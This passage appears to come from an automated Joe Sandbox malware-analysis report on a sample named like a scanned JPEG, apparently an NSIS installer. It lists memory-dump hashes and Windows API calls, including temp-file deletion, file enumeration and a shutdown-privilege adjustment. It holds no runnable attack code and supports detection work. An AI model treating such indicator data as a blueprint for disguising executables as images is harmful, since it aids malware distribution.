                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6d17f17615f9821d72d8fba80392d0bac0a17173041085575724713d53828a7e
                                  • Instruction ID: 3654908ea4ef5f814db9df6ecb1f8bfde06b8a12f29250d24757989852b60fe2
                                  • Opcode Fuzzy Hash: 6d17f17615f9821d72d8fba80392d0bac0a17173041085575724713d53828a7e
                                  • Instruction Fuzzy Hash: 9A118236B041148BEF55DA78C814A9E72EAEBC8710F048139C505EB340EF65DC128BA0
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 445f90309ed307e981361099136e50b26831296a794964a4f5e4935543fd5ebb
                                  • Instruction ID: d4db4bdab8eb8cf81fb54eff2c27060dffbc560c56b0fc16e20ae7f6be42402d
                                  • Opcode Fuzzy Hash: 445f90309ed307e981361099136e50b26831296a794964a4f5e4935543fd5ebb
                                  • Instruction Fuzzy Hash: AD11A731A00255DFCF22EFB884546AD7BB5EF49312B14047AE825EB241E731CC868B91
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9308119e6334cfaaced686caabb34648ecf12e08ed533b5f8f29d0fa2458ae7a
                                  • Instruction ID: 6d0b7b4ce8b2dd11dc3db5b2a26f3930e69684dfc21fd2e9ec17b716e2569895
                                  • Opcode Fuzzy Hash: 9308119e6334cfaaced686caabb34648ecf12e08ed533b5f8f29d0fa2458ae7a
                                  • Instruction Fuzzy Hash: 5F116AB2800249DFCB10CF99D844BEEBFF4EF48360F148429E918A7241C379A954DFA5
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a681c6234be2febcdbf300d052b12159ded35e114c6e409b885939975377df34
                                  • Instruction ID: df3d5145e82af4d7fa5c2d72041c9f138f467d2a0a6ec9621685f9977f9b1a46
                                  • Opcode Fuzzy Hash: a681c6234be2febcdbf300d052b12159ded35e114c6e409b885939975377df34
                                  • Instruction Fuzzy Hash: 4F017136B046100BFB15966C9464B5F77EBEBCB710F11843AE44ACB351EE29DC0387A5
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 03f70e21c3b609c69625e2664485f27032884196ed4952ecc8f5a27c0a72432d
                                  • Instruction ID: c57a7ef2110d87346caf3b85557903796d9a22bfdbb0b2e9f2aa2481d13c546c
                                  • Opcode Fuzzy Hash: 03f70e21c3b609c69625e2664485f27032884196ed4952ecc8f5a27c0a72432d
                                  • Instruction Fuzzy Hash: FA116AB6800249DFCB11CF99D944BDEBBF4EF48350F148419E514A7241C3359555DFA1
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d7c86710c1d663c769188ffff307b91c17565cbfd013833c297e96c6ae7123c0
                                  • Instruction ID: ae307ce52a4cdab481cd0540fa319a47c8446da13e458249aeacc5e62fc7896a
                                  • Opcode Fuzzy Hash: d7c86710c1d663c769188ffff307b91c17565cbfd013833c297e96c6ae7123c0
                                  • Instruction Fuzzy Hash: E7016171E00255EBCF22EFB984552AE7BF9EB49312B14047AE825EB241E735CC858B91
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: df2f9f6e092c8008095203b9b8bf395b53c213c479c0bdc85e62e9d19a91596f
                                  • Instruction ID: 4f3090523eda1d532685fd6594ff2824c01a77a9d7bcbe2bf0a3575f08e49ce0
                                  • Opcode Fuzzy Hash: df2f9f6e092c8008095203b9b8bf395b53c213c479c0bdc85e62e9d19a91596f
                                  • Instruction Fuzzy Hash: 5901B13AB002145BEF45EA78C924BDF73ABEBC8300F05843AC105EB240EF619D129BE1
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6bb49347af080c49a55d4ea7778f47ce57330e7e0136bbd6996e148486855e60
                                  • Instruction ID: dc37a234641e9443583dc909341533eaa4c24295e0196e372b52d0bdf9e276ae
                                  • Opcode Fuzzy Hash: 6bb49347af080c49a55d4ea7778f47ce57330e7e0136bbd6996e148486855e60
                                  • Instruction Fuzzy Hash: 7C11B0B5D01259AFCB00DFAAD884BDEFBF4FF49350F50852AE518A7240C374A954CBA5
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9da1230fbc517a322c6dfc667873d98388726a86b3cd7292d657ea7278e9415b
                                  • Instruction ID: 36f49bab0bd4b99e2a5e62670004d4ca804d242cab0af7f6b6f6545a916c16e5
                                  • Opcode Fuzzy Hash: 9da1230fbc517a322c6dfc667873d98388726a86b3cd7292d657ea7278e9415b
                                  • Instruction Fuzzy Hash: D40162367045104BFB14966D9414B0BA3DFDBCA760F108439E10ECB355DE65DC5247A5
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 465a1d196d024e0f6a83fac48dc9a2b9e2e17dbce5c989af3ae92a948b9904d9
                                  • Instruction ID: 25815f61b871b18b0bbadbb4845ca62a12a6741ceed476f58d480a110fbbea0b
                                  • Opcode Fuzzy Hash: 465a1d196d024e0f6a83fac48dc9a2b9e2e17dbce5c989af3ae92a948b9904d9
                                  • Instruction Fuzzy Hash: 9E01AF3A7006110BFB15966C98A4F1F77DBEBCA760F118839E50AC7341EF29DC0287A5
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e9080958063b4539f326b589d3fd4355c3495a1463d58a43df3832bfb4632730
                                  • Instruction ID: 32f68664826ef366bf0cfdc337360b52f0672bd1c4dd5beb4b1b9512e1007ca5
                                  • Opcode Fuzzy Hash: e9080958063b4539f326b589d3fd4355c3495a1463d58a43df3832bfb4632730
                                  • Instruction Fuzzy Hash: FDF0F421A19A06C6EE3B11E84914B3C6211AB6833BF54063ADC7ACF296C700CC5DE2D6
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f545ada907168ac3137942b54c4438d7e4b0f33a6f7a9cd6fb61c9c14ad3d27
                                  • Instruction ID: c67d1946a6e89167b5b486c51d133e128f56587328e2ef3fdd0b0dfafa54c0d1
                                  • Opcode Fuzzy Hash: 1f545ada907168ac3137942b54c4438d7e4b0f33a6f7a9cd6fb61c9c14ad3d27
                                  • Instruction Fuzzy Hash: 59018739B004144BF710EA7CD864B5A77DAEB8A764F108838E10EDB750EF29EC0287A5
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 62a5a84252451df73310957230a702de02b29e74098e9bf92cd6157264e8b19a
                                  • Instruction ID: 707a0294994eadf9badc7fcab2cc549d5261a5fb50f8765ffe01ef91ab98f8f8
                                  • Opcode Fuzzy Hash: 62a5a84252451df73310957230a702de02b29e74098e9bf92cd6157264e8b19a
                                  • Instruction Fuzzy Hash: E00122357003150FEB11EA39D86169B73EBEFC6760F86487AE446CB241CB24DC06CBA1
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7602021631a702b2da55f48faaca4ce74885f64cab8defc564d3403ba143b0e8
                                  • Instruction ID: 6c4ad6ad2d9419882e4589f240e4a19fb65c68afc89e5848b6974be2ca32df03
                                  • Opcode Fuzzy Hash: 7602021631a702b2da55f48faaca4ce74885f64cab8defc564d3403ba143b0e8
                                  • Instruction Fuzzy Hash: 0B01D130A00254DBDB00EBB888513AE3BE5AF04751F204465D929EF292FB25CA869B86
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 44b0a8f350e37fcc0d0073eb3c067e48103a2daad9f4f273c67bf74821b483fe
                                  • Instruction ID: 6e9606218b668df45528fdf0a729c3a4b13e4a4b5e466ba9b5c4ad801a5e7524
                                  • Opcode Fuzzy Hash: 44b0a8f350e37fcc0d0073eb3c067e48103a2daad9f4f273c67bf74821b483fe
                                  • Instruction Fuzzy Hash: 1BF08C35B001188BDB04CBA8D840BDEB7F1FF88326F148261E529AB295D635D9158BA0
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 84c3458ec9ba50a838d79ddb8305ed9d073abab9a1eed4a293f4d39ac607d56f
                                  • Instruction ID: bafedebca8cad203b09067d976dad1d797c5f2ff7d7b4d0bec8e1b042ada8bea
                                  • Opcode Fuzzy Hash: 84c3458ec9ba50a838d79ddb8305ed9d073abab9a1eed4a293f4d39ac607d56f
                                  • Instruction Fuzzy Hash: C9F08276700218ABDF059E99E8119AF7BEBEBC8360B40803AF91997251DF325D2197B1
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cfa653bcc59caaaf5cfec0afece7277f8b4532fb6254c829d867a7227577a673
                                  • Instruction ID: 3f75d3e6160bb4c62644bd197cc1ec4d4ab1a099b08fa443bf9d571908bacf15
                                  • Opcode Fuzzy Hash: cfa653bcc59caaaf5cfec0afece7277f8b4532fb6254c829d867a7227577a673
                                  • Instruction Fuzzy Hash: 06F0A037A10268A7DB249976DC00A9BB77AF784355F10442AED10AB340EB71AC06CBE0
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e9dcbf76dda1a92440aa1bd09600be8c6346b234037de58f722f6eb584d410bd
                                  • Instruction ID: d4976949d8a9441db9bdf110668da5968fbaf51d705e1117425412191dbdcd4f
                                  • Opcode Fuzzy Hash: e9dcbf76dda1a92440aa1bd09600be8c6346b234037de58f722f6eb584d410bd
                                  • Instruction Fuzzy Hash: 4FF0A0B2E00215CFCB90EEB8A9002EBBBF1EB44340F114826C814E7200E730DA168BC1
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb6be1fe3d2fa395d0035a1fcd5d8b20a388e6ff651d8cd0587bd8792c32612d
                                  • Instruction ID: 2a1b456f20b84f4bb78dee86092267929f4c7d22945a3f48dfc825a3903b87ea
                                  • Opcode Fuzzy Hash: fb6be1fe3d2fa395d0035a1fcd5d8b20a388e6ff651d8cd0587bd8792c32612d
                                  • Instruction Fuzzy Hash: 81F05E7BE08214CFEB24CE64E9407A97BB5FB40391F116065D902A7190CB759947CAB1
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0360c2203ceb174d2c402b4b96c1b67add400cfa62e6d6d0de650ade4375fc00
                                  • Instruction ID: 77e10f976d2c1b3ee8df467a3064f92a53bc67a348257cefbeb2170109690f99
                                  • Opcode Fuzzy Hash: 0360c2203ceb174d2c402b4b96c1b67add400cfa62e6d6d0de650ade4375fc00
                                  • Instruction Fuzzy Hash: 1FE01AB1E10219DB8B54EEB9A8042AA7AF8AB54291F108876D819E7200E731DA148BD1
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3558facd179fe7dee0e55ff62267f25f6cb13a120c1993bfd89486d6e23075d1
                                  • Instruction ID: f2723bd1bfa926155bd412111cfbdb4b64c251b7d1ff456c3810e90b5f988fd1
                                  • Opcode Fuzzy Hash: 3558facd179fe7dee0e55ff62267f25f6cb13a120c1993bfd89486d6e23075d1
                                  • Instruction Fuzzy Hash: 14F0FE75A20219EFDB14DF90E9557AD7BB2FF88700F200219E802A7294DB741C42DF90
                                  APIs
                                  • SetErrorMode.KERNEL32 ref: 004031FB
                                  • GetVersion.KERNEL32 ref: 00403201
                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403234
                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403270
                                  • OleInitialize.OLE32(00000000), ref: 00403277
                                  • SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403293
                                  • GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 004032A8
                                  • CharNextA.USER32(00000000,00429000,00000020,00429000,00000000,?,00000006,00000008,0000000A), ref: 004032E4
                                  • GetTempPathA.KERNEL32(00000400,0042A400,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033E1
                                  • GetWindowsDirectoryA.KERNEL32(0042A400,000003FB,?,00000006,00000008,0000000A), ref: 004033F2
                                  • lstrcatA.KERNEL32(0042A400,\Temp,?,00000006,00000008,0000000A), ref: 004033FE
                                  • GetTempPathA.KERNEL32(000003FC,0042A400,0042A400,\Temp,?,00000006,00000008,0000000A), ref: 00403412
                                  • lstrcatA.KERNEL32(0042A400,Low,?,00000006,00000008,0000000A), ref: 0040341A
                                  • SetEnvironmentVariableA.KERNEL32(TEMP,0042A400,0042A400,Low,?,00000006,00000008,0000000A), ref: 0040342B
                                  • SetEnvironmentVariableA.KERNEL32(TMP,0042A400,?,00000006,00000008,0000000A), ref: 00403433
                                  • DeleteFileA.KERNEL32(0042A000,?,00000006,00000008,0000000A), ref: 00403447
                                    • Part of subcall function 00406302: GetModuleHandleA.KERNEL32(?,?,?,00403249,0000000A), ref: 00406314
                                    • Part of subcall function 00406302: GetProcAddress.KERNEL32(00000000,?), ref: 0040632F
                                    • Part of subcall function 00403798: lstrlenA.KERNEL32(004226A0,?,?,?,004226A0,00000000,00429400,0042A000,0041FD08,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD08,00000000,00000002,75953410), ref: 00403888
                                    • Part of subcall function 00403798: lstrcmpiA.KERNEL32(?,.exe), ref: 0040389B
                                    • Part of subcall function 00403798: GetFileAttributesA.KERNEL32(004226A0), ref: 004038A6
                                    • Part of subcall function 00403798: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00429400), ref: 004038EF
                                    • Part of subcall function 00403798: RegisterClassA.USER32(00422EA0), ref: 0040392C
                                    • Part of subcall function 004036BE: CloseHandle.KERNEL32(FFFFFFFF,004034F5,?,?,00000006,00000008,0000000A), ref: 004036C9
                                  • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 004034F5
                                  • ExitProcess.KERNEL32 ref: 00403516
                                  • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403633
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0040363A
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403652
                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403671
                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403695
                                  • ExitProcess.KERNEL32 ref: 004036B8
                                    • Part of subcall function 00405686: MessageBoxIndirectA.USER32(00409218), ref: 004056E1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                  • String ID: "$.tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                  • API String ID: 3776617018-3048946811
                                  • Opcode ID: a91a174bc5d1d230ddfb7dff79904cc1c57bb7c02f16d3283ab930755c51460b
                                  • Instruction ID: 9e312bc3f5d3d37e61d45afab2cefd1cff230aa7333539c56d086af75f350ab7
                                  • Opcode Fuzzy Hash: a91a174bc5d1d230ddfb7dff79904cc1c57bb7c02f16d3283ab930755c51460b
                                  • Instruction Fuzzy Hash: 90C106706082426AE7216F719D4DB2B3EACEB85706F04457FF581B61E2C77C8A05CB2E
                                  APIs
                                  • GetDlgItem.USER32(?,000003F9), ref: 00404A26
                                  • GetDlgItem.USER32(?,00000408), ref: 00404A31
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A7B
                                  • LoadBitmapA.USER32(0000006E), ref: 00404A8E
                                  • SetWindowLongA.USER32(?,000000FC,00405005), ref: 00404AA7
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404ABB
                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404ACD
                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404AE3
                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AEF
                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B01
                                  • DeleteObject.GDI32(00000000), ref: 00404B04
                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B2F
                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B3B
                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BD0
                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BFB
                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C0F
                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404C3E
                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C4C
                                  • ShowWindow.USER32(?,00000005), ref: 00404C5D
                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D5A
                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DBF
                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DD4
                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DF8
                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E18
                                  • ImageList_Destroy.COMCTL32(?), ref: 00404E2D
                                  • GlobalFree.KERNEL32(?), ref: 00404E3D
                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EB6
                                  • SendMessageA.USER32(?,00001102,?,?), ref: 00404F5F
                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F6E
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F8E
                                  • ShowWindow.USER32(?,00000000), ref: 00404FDC
                                  • GetDlgItem.USER32(?,000003FE), ref: 00404FE7
                                  • ShowWindow.USER32(00000000), ref: 00404FEE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                  • String ID: $M$N
                                  • API String ID: 1638840714-813528018
                                  • Opcode ID: 4e752241f8a22205b313c674a0fa0ac315a159478eb51d1d4232cd19beea6f76
                                  • Instruction ID: e53edbee2b152b0549b5e4175851bd50996010034005c2ce37e30fc0cedab0f1
                                  • Opcode Fuzzy Hash: 4e752241f8a22205b313c674a0fa0ac315a159478eb51d1d4232cd19beea6f76
                                  • Instruction Fuzzy Hash: A50260B0900209AFEB20DF94DC85AAE7BB5FB84315F10817AF610B62E1D7799D42DF58
                                  APIs
                                  • DeleteFileA.KERNEL32(?,?,75953410,0042A400,00000000), ref: 0040575B
                                  • lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,75953410,0042A400,00000000), ref: 004057A3
                                  • lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,75953410,0042A400,00000000), ref: 004057C4
                                  • lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,75953410,0042A400,00000000), ref: 004057CA
                                  • FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,75953410,0042A400,00000000), ref: 004057DB
                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405888
                                  • FindClose.KERNEL32(00000000), ref: 00405899
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2035342205-1173974218
                                  • Opcode ID: f68f1787a7535e61b3df604e6a8492ba07a213b852bbd40fa4bcb335dd7bb391
                                  • Instruction ID: 4530166bbd706fa81c440e6583376772d6fc270faa34d54a03d6882d8fc6be8c
                                  • Opcode Fuzzy Hash: f68f1787a7535e61b3df604e6a8492ba07a213b852bbd40fa4bcb335dd7bb391
                                  • Instruction Fuzzy Hash: 7351B332904A09BADB216B728C45BAF7A78DF42714F14817BF841B11D2D73C8952DEA9
                                  Memory Dump Source
